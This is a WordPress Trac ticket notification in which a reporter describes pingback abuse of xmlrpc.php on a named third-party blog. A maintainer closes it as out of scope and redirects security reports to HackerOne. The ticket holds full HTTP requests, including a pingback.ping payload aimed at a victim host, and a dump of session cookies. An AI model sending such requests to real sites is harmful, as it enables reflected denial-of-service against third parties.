[wp-trac] [WordPress Trac] #47551: xmlrpc.php FILE is enable .It can be used for bruteforce attack and denial of service
WordPress Trac
noreply at wordpress.org
Mon Jun 17 15:27:31 UTC 2019
#47551: xmlrpc.php FILE is enable .It can be used for bruteforce attack and denial
of service
----------------------------+------------------------
Reporter: pranayjain2511 | Owner: marybaum
Type: defect (bug) | Status: closed
Priority: normal | Milestone:
Component: XML-RPC | Version: 5.0.1
Severity: normal | Resolution: duplicate
Keywords: | Focuses:
----------------------------+------------------------
Changes (by SergeyBiryukov):
* status: accepted => closed
* priority: high => normal
* milestone: Awaiting Review =>
* keywords: needs-patch possible-vulnerability =>
* resolution: => duplicate
* severity: major => normal
Old description:
> https://blog.optimizely.com/ is wordpress site
>
> Wordpress that have xmlrpc.php enabled for pingbacks, trackbacks, etc.
> can be made as a part of a huge botnet causing a major DDOS. The website
> https://blog.optimizely.com/ has the xmlrpc.php file enabled and could
> thus be potentially used for such an attack against other victim hosts.
> In order to determine whether the xmlrpc.php file is enabled or not,
> using the Repeater tab in Burp, send the request below.
>
> POST /xmlrpc.php HTTP/1.1
> Host: blog.optimizely.com
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
> Firefox/60.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Cookie: optimizelyEndUserId=appuid1560332752535r0.612773859597;
> ajs_user_id=null; ajs_group_id=null; _ga=GA1.2.1174789383.1560332759;
> ajs_anonymous_id=%22c0afa840-96c3-49f6-a1b2-6aba203b1da1%22;
> OptanonConsent=landingPath=NotLandingPage&datestamp=Sat+Jun+15+2019+14%3A19%3A09+GMT%2B0530+(IST)&version=4.4.0&EU=false&groups=0_137018%3A1%2C0_137037%3A1%2C1%3A1%2C0_83485%3A1%2C0_84623%3A1%2C123%3A1%2C2%3A1%2C0_137040%3A1%2C3%3A1%2C154%3A1%2C4%3A1%2C0_85305%3A1%2C173%3A1%2C0_87040%3A1%2C101%3A1%2C0_84626%3A1%2C0_87042%3A1%2C0_83478%3A1%2C0_137008%3A1%2C0_137015%3A1%2C0_137039%3A1%2C117%3A1%2C0_137131%3A1%2C0_137030%3A1%2C132%3A1%2C128%3A1%2C164%3A1%2C0_85872%3A1%2C0_85873%3A1%2C0_137012%3A1%2C0_137059%3A1%2C0_83482%3A1%2C0_83484%3A1%2C0_83483%3A1&AwaitingReconsent=false;
> _gcl_au=1.1.17915353.1560333353; marketo_utm_content=webpromo-
> login1-everyone; marketo_utm_medium=referral;
> marketo_utm_source=optimizely; _mkto_trk=id:361-GER-922&token:_mch-
> optimizely.com-1560333355657-34661;
> amplitude_id_12138f24f4eb62c4ce13454cf1876f9doptimizely.com=eyJkZXZpY2VJZCI6ImYwZDdjMTc1LTc4NzYtNDg3My1hNTBlLWNlMGFjMGQ2YTQyN1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2MDU4ODQwNTU1NSwibGFzdEV2ZW50VGltZSI6MTU2MDU4ODU3MTcwMCwiZXZlbnRJZCI6MTYsImlkZW50aWZ5SWQiOjMsInNlcXVlbmNlTnVtYmVyIjoxOX0=;
> _fbp=fb.1.1560333359887.541662801; __qca=P0-1900880018-1560333359980;
> _gid=GA1.2.871921774.1560541163;
> sgPopupDetails4=%7B%22popupId%22%3A%224%22%2C%22openCounter%22%3A1%2C%22openLimit%22%3A%221%22%7D;
> amplitude_idundefinedoptimizely.com=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ==
> Connection: close
> Upgrade-Insecure-Requests: 1
> Cache-Control: max-age=0
> Content-Length: 93
>
> <methodCall>
> <methodName>system.listMethods</methodName>
> <params>
> </params>
> </methodCall>
>
> Notice that a successful response is received showing that the xmlrpc.php
> file is enabled.
> Now, considering the domain https://blog.optimizely.com, the xmlrpc.php
> file discussed above could potentially be abused to cause a DDOS attack
> against a victim host. This is achieved by simply sending a request that
> looks like below.
>
> As soon as the above request is sent, the victim host
> (http://hackersera.com) gets an entry in its log file with a request
> originating from the https://blog.optimizely.com domain verifying the
> pingback.
>
> remediation:
>
> If the XMLRPC.php file is not being used, it should be disabled and
> removed completely to avoid any potential risks. Otherwise, it should at
> the very least be blocked from external access.
>
> thanks
>
> note: screenshots are given below
>
> http request
> POST /xmlrpc.php HTTP/1.1
> Host: blog.optimizely.com
> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
> Firefox/60.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Cookie: optimizelyEndUserId=appuid1560332752535r0.612773859597;
> ajs_user_id=null; ajs_group_id=null; _ga=GA1.2.1174789383.1560332759;
> ajs_anonymous_id=%22c0afa840-96c3-49f6-a1b2-6aba203b1da1%22;
> OptanonConsent=landingPath=NotLandingPage&datestamp=Sat+Jun+15+2019+14%3A19%3A09+GMT%2B0530+(IST)&version=4.4.0&EU=false&groups=0_137018%3A1%2C0_137037%3A1%2C1%3A1%2C0_83485%3A1%2C0_84623%3A1%2C123%3A1%2C2%3A1%2C0_137040%3A1%2C3%3A1%2C154%3A1%2C4%3A1%2C0_85305%3A1%2C173%3A1%2C0_87040%3A1%2C101%3A1%2C0_84626%3A1%2C0_87042%3A1%2C0_83478%3A1%2C0_137008%3A1%2C0_137015%3A1%2C0_137039%3A1%2C117%3A1%2C0_137131%3A1%2C0_137030%3A1%2C132%3A1%2C128%3A1%2C164%3A1%2C0_85872%3A1%2C0_85873%3A1%2C0_137012%3A1%2C0_137059%3A1%2C0_83482%3A1%2C0_83484%3A1%2C0_83483%3A1&AwaitingReconsent=false;
> _gcl_au=1.1.17915353.1560333353; marketo_utm_content=webpromo-
> login1-everyone; marketo_utm_medium=referral;
> marketo_utm_source=optimizely; _mkto_trk=id:361-GER-922&token:_mch-
> optimizely.com-1560333355657-34661;
> amplitude_id_12138f24f4eb62c4ce13454cf1876f9doptimizely.com=eyJkZXZpY2VJZCI6ImYwZDdjMTc1LTc4NzYtNDg3My1hNTBlLWNlMGFjMGQ2YTQyN1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2MDU4ODQwNTU1NSwibGFzdEV2ZW50VGltZSI6MTU2MDU4ODU3MTcwMCwiZXZlbnRJZCI6MTYsImlkZW50aWZ5SWQiOjMsInNlcXVlbmNlTnVtYmVyIjoxOX0=;
> _fbp=fb.1.1560333359887.541662801; __qca=P0-1900880018-1560333359980;
> _gid=GA1.2.871921774.1560541163;
> sgPopupDetails4=%7B%22popupId%22%3A%224%22%2C%22openCounter%22%3A1%2C%22openLimit%22%3A%221%22%7D;
> amplitude_idundefinedoptimizely.com=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ==
> Connection: close
> Upgrade-Insecure-Requests: 1
> Cache-Control: max-age=0
> Content-Length: 234
>
> <methodCall>
> <methodName>pingback.ping</methodName>
> <params>
> <param><value><string>http://hackersera.com</string></value></param>
> <param><value><string>https://blog.optimizely.com</string></value></param>
> </params>
> </methodCall>
>
> NOte : Please find attachments for POc In the following URL :
> https://drive.google.com/folderview?id=18ZR6OK8WH2FnFu2vviw5EvyvWu5qMbEn
New description:
https://blog.optimizely.com/ is wordpress site
Wordpress that have xmlrpc.php enabled for pingbacks, trackbacks, etc. can
be made as a part of a huge botnet causing a major DDOS. The website
https://blog.optimizely.com/ has the xmlrpc.php file enabled and could
thus be potentially used for such an attack against other victim hosts.
In order to determine whether the xmlrpc.php file is enabled or not, using
the Repeater tab in Burp, send the request below.
{{{
POST /xmlrpc.php HTTP/1.1
Host: blog.optimizely.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: optimizelyEndUserId=appuid1560332752535r0.612773859597;
ajs_user_id=null; ajs_group_id=null; _ga=GA1.2.1174789383.1560332759;
ajs_anonymous_id=%22c0afa840-96c3-49f6-a1b2-6aba203b1da1%22;
OptanonConsent=landingPath=NotLandingPage&datestamp=Sat+Jun+15+2019+14%3A19%3A09+GMT%2B0530+(IST)&version=4.4.0&EU=false&groups=0_137018%3A1%2C0_137037%3A1%2C1%3A1%2C0_83485%3A1%2C0_84623%3A1%2C123%3A1%2C2%3A1%2C0_137040%3A1%2C3%3A1%2C154%3A1%2C4%3A1%2C0_85305%3A1%2C173%3A1%2C0_87040%3A1%2C101%3A1%2C0_84626%3A1%2C0_87042%3A1%2C0_83478%3A1%2C0_137008%3A1%2C0_137015%3A1%2C0_137039%3A1%2C117%3A1%2C0_137131%3A1%2C0_137030%3A1%2C132%3A1%2C128%3A1%2C164%3A1%2C0_85872%3A1%2C0_85873%3A1%2C0_137012%3A1%2C0_137059%3A1%2C0_83482%3A1%2C0_83484%3A1%2C0_83483%3A1&AwaitingReconsent=false;
_gcl_au=1.1.17915353.1560333353; marketo_utm_content=webpromo-
login1-everyone; marketo_utm_medium=referral;
marketo_utm_source=optimizely; _mkto_trk=id:361-GER-922&token:_mch-
optimizely.com-1560333355657-34661;
amplitude_id_12138f24f4eb62c4ce13454cf1876f9doptimizely.com=eyJkZXZpY2VJZCI6ImYwZDdjMTc1LTc4NzYtNDg3My1hNTBlLWNlMGFjMGQ2YTQyN1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2MDU4ODQwNTU1NSwibGFzdEV2ZW50VGltZSI6MTU2MDU4ODU3MTcwMCwiZXZlbnRJZCI6MTYsImlkZW50aWZ5SWQiOjMsInNlcXVlbmNlTnVtYmVyIjoxOX0=;
_fbp=fb.1.1560333359887.541662801; __qca=P0-1900880018-1560333359980;
_gid=GA1.2.871921774.1560541163;
sgPopupDetails4=%7B%22popupId%22%3A%224%22%2C%22openCounter%22%3A1%2C%22openLimit%22%3A%221%22%7D;
amplitude_idundefinedoptimizely.com=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ==
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 93
<methodCall>
<methodName>system.listMethods</methodName>
<params>
</params>
</methodCall>
}}}
Notice that a successful response is received showing that the xmlrpc.php
file is enabled.
Now, considering the domain https://blog.optimizely.com, the xmlrpc.php
file discussed above could potentially be abused to cause a DDOS attack
against a victim host. This is achieved by simply sending a request that
looks like below.
As soon as the above request is sent, the victim host
(http://hackersera.com) gets an entry in its log file with a request
originating from the https://blog.optimizely.com domain verifying the
pingback.
remediation:
If the XMLRPC.php file is not being used, it should be disabled and
removed completely to avoid any potential risks. Otherwise, it should at
the very least be blocked from external access.
thanks
note: screenshots are given below
http request
{{{
POST /xmlrpc.php HTTP/1.1
Host: blog.optimizely.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: optimizelyEndUserId=appuid1560332752535r0.612773859597;
ajs_user_id=null; ajs_group_id=null; _ga=GA1.2.1174789383.1560332759;
ajs_anonymous_id=%22c0afa840-96c3-49f6-a1b2-6aba203b1da1%22;
OptanonConsent=landingPath=NotLandingPage&datestamp=Sat+Jun+15+2019+14%3A19%3A09+GMT%2B0530+(IST)&version=4.4.0&EU=false&groups=0_137018%3A1%2C0_137037%3A1%2C1%3A1%2C0_83485%3A1%2C0_84623%3A1%2C123%3A1%2C2%3A1%2C0_137040%3A1%2C3%3A1%2C154%3A1%2C4%3A1%2C0_85305%3A1%2C173%3A1%2C0_87040%3A1%2C101%3A1%2C0_84626%3A1%2C0_87042%3A1%2C0_83478%3A1%2C0_137008%3A1%2C0_137015%3A1%2C0_137039%3A1%2C117%3A1%2C0_137131%3A1%2C0_137030%3A1%2C132%3A1%2C128%3A1%2C164%3A1%2C0_85872%3A1%2C0_85873%3A1%2C0_137012%3A1%2C0_137059%3A1%2C0_83482%3A1%2C0_83484%3A1%2C0_83483%3A1&AwaitingReconsent=false;
_gcl_au=1.1.17915353.1560333353; marketo_utm_content=webpromo-
login1-everyone; marketo_utm_medium=referral;
marketo_utm_source=optimizely; _mkto_trk=id:361-GER-922&token:_mch-
optimizely.com-1560333355657-34661;
amplitude_id_12138f24f4eb62c4ce13454cf1876f9doptimizely.com=eyJkZXZpY2VJZCI6ImYwZDdjMTc1LTc4NzYtNDg3My1hNTBlLWNlMGFjMGQ2YTQyN1IiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTU2MDU4ODQwNTU1NSwibGFzdEV2ZW50VGltZSI6MTU2MDU4ODU3MTcwMCwiZXZlbnRJZCI6MTYsImlkZW50aWZ5SWQiOjMsInNlcXVlbmNlTnVtYmVyIjoxOX0=;
_fbp=fb.1.1560333359887.541662801; __qca=P0-1900880018-1560333359980;
_gid=GA1.2.871921774.1560541163;
sgPopupDetails4=%7B%22popupId%22%3A%224%22%2C%22openCounter%22%3A1%2C%22openLimit%22%3A%221%22%7D;
amplitude_idundefinedoptimizely.com=eyJvcHRPdXQiOmZhbHNlLCJzZXNzaW9uSWQiOm51bGwsImxhc3RFdmVudFRpbWUiOm51bGwsImV2ZW50SWQiOjAsImlkZW50aWZ5SWQiOjAsInNlcXVlbmNlTnVtYmVyIjowfQ==
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 234
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://hackersera.com</string></value></param>
<param><value><string>https://blog.optimizely.com</string></value></param>
</params>
</methodCall>
}}}
NOte : Please find attachments for POc In the following URL :
https://drive.google.com/folderview?id=18ZR6OK8WH2FnFu2vviw5EvyvWu5qMbEn
--
Comment:
Hi @pranayjain2511, welcome to WordPress Trac!
A DoS (Denial of Service) against `xmlrpc.php` is no different to one
against the homepage or `wp-login.php`, preventing is out of scope for
WordPress. Caching and security plugins often attempt to cover this well,
but ultimately it's a issue that needs to be handled at the server level.
See #35532, #36806, #24193, and other similar tickets.
Additionally, when writing this ticket you should have seen this notice:
> **Do not report potential security vulnerabilities here.**
> See the [https://make.wordpress.org/core/handbook/reporting-security-
vulnerabilities/ Security FAQ] and visit the
[https://hackerone.com/wordpress WordPress HackerOne program].
--
Ticket URL: <https://core.trac.wordpress.org/ticket/47551#comment:4>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list